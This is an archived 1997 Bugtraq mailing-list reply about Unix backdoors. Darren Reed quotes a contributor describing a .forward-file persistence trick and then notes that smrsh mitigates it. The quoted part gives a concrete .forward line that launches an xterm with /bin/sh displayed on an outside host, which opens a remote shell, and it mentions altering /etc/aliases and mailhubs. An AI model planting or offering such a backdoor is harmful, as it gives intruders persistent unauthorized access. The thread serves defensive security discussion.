Bugtraq mailing list archives
Re: Backdoor Paper
From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Tue, 26 Aug 1997 10:31:36 +1000
In some mail from Evil Pete, sie said:
Here's a paper I wrote on backdoors. Feedback welcome.<snip> you may want to add: .forward Backdoor On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username'' a .forward file might be constructed as follows: \username |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh" permutations of this method include alteration of the systems mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing). -Pete PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and server).
Using smrsh can effectively negate this backdoor (although it's quite possibly still a problem if you allow things like elm's filter or procmail which can run programs themselves...). Darren
Current thread:
- Re: Backdoor Paper Nicolas Dubee (Jul 27)
- <Possible follow-ups>
- Backdoor Paper Christopher Klaus (Aug 16)
- Re: Backdoor Paper Evil Pete (Aug 25)
- Re: Backdoor Paper Darren Reed (Aug 25)